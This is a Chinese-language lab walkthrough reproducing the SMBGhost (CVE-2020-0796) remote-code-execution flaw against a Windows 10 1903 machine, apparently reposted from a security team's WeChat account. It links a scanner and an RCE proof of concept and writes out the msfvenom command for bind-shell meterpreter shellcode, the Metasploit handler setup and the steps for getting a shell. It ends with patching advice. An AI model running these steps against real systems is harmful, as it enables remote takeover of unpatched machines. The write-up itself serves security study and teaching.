前言
漏洞详情
漏洞介绍
影响范围
环境准备
攻击机:Kali Lunix 2020.1
ip : 192.168.44.130
靶机:Windows 10 Version 1903 for 32-bit Systems
ip :192.168.. 44.137
检测poc下载:https://github.com/ollypwn/SMBGhost/blob/master/scanner.py
CVE-2020-0796 "poc"下载: https://github.com/chompie1337/SMBGhost_RCE_PoC
漏洞复现
使用scanner.py poc探测靶机是否存在CVE2020-0796漏洞
使用msfvenom 生成正向链接木马获取shellcode
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b 'x00' -i 1 -f python
启动msf控制端设置有效攻击载荷,并开启4444端口监听
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 4444
set rhost 192.168.44.137
run
将生成的shellcode替换到exploit.py,注意buf改成USER_PAYLOAD
执行poc
由于poc不稳定,可能会出现physical read primitive failed!的错误,需要多试几次
Msf收到响应信息
输入shell反弹成功
参考:
https://www.freebuf.com/vuls/247422.html
预防与修复
-
从Windows Update更新,并确保安装最新的2020年3月份安全更新或累积更新。
-
前往微软官方网站,自行下载对应的补丁。
- End -
原文始发于微信公众号(NS Demon团队):CVE2020-0796 永恒之黑 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论